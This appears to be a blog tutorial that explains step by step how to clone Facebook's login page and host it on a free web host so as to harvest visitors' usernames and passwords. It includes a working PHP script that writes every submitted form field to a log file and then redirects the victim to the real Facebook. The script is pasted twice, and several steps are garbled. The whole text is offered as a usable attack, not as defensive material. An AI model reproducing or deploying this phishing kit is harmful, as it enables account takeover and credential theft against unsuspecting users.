Facebook phishing Page
Facebook phishing page:-
What is phishing page?
Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc.Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details
How to make a phishing Page :-
- open any web browser
- Type www.facebook.com on the URL
3. Right click on the facebook page and Click on "View Page Source"
4. Now Copy the whole php code
5. Now paste the copied code into a Notepad File.
6. Save the file as Index.html ,
7. Now ready any php script which can send You password
this is script below which you can paste into the from of .php file
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
8. Now save this pho script as Login.php
9. Now open any free webhost website and upload the two files.10. Goto any free webhosting website, here i used 000webhost.com
11. Sing Up here and goto File Manager and click on upload file.
12. There you will find public_html option, and here you will see a file named by:- .htaccess
13. Now on the top right you will see the upload option , click on it and upload the two files which
you have saved before as:- Index.html and login.php .
14. Now you will see in the index_html file there are the two files which you have uploaded.
15. Now goto the file Manager section of 000webhost.com where you will find you website address.
16. Now here will be Magic, Just click on the web address which is look like this
17. you will find your phishing page there
18. The above picture is look like a facebook page but its clone ,
19. Now Put you user id and Password and it will save you User id and Password to public_html
20. Now try it.
Comments
Post a Comment